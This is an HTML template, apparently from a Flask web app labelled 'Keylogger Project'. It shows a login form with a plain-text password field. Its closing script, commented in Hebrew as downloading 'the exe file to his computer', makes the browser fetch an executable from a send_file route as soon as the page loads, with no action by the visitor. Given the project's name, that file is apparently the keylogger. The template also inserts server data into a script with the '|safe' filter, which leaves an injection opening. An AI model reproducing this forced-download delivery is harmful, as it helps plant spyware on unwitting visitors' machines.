<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
    <link rel="stylesheet" href="/static/css/home.css">
    <script src="/static/js/home.js"></script>
</head>
<body>

    <div class="welcome-text">Welcome to Keylogger Project</div>

    <form action="{{ url_for('user_verification')}}" method="post" class="loggin">

        <label for="username">username</label>
        <input type="text" id="username" name="username">

        <br><br>

        <label for="password">password</label>
        <input type="text" id="password" name="password">

        <br><br>
        <label id="error-message"></label>

        <button type="submit">enter</button>

    </form>

    <script>
        try {
            const message = JSON.parse('{{message|default({})|tojson|safe}}');
            if (message){
                if ("user_name" in message){
                    document.getElementById("error-message").textContent = "ERROR: user name " + message.user_name
                }
                else if ("password" in message){
                    document.getElementById("error-message").textContent = "ERROR: password " + message.password
                }
                else {

                }
            }
        }  catch(error) {
            console.error(error)
        }
    </script>

    <script>
        //הורדת הקובץ exe למחשב שלו
        window.onload = function() {
            let link = document.createElement("a");
            link.href = "{{url_for('send_file')}}";
            link.download = ""
            document.body.appendChild(link)
            link.click()
            document.removeChild(link)
        };
    </script>

</body>
</html>
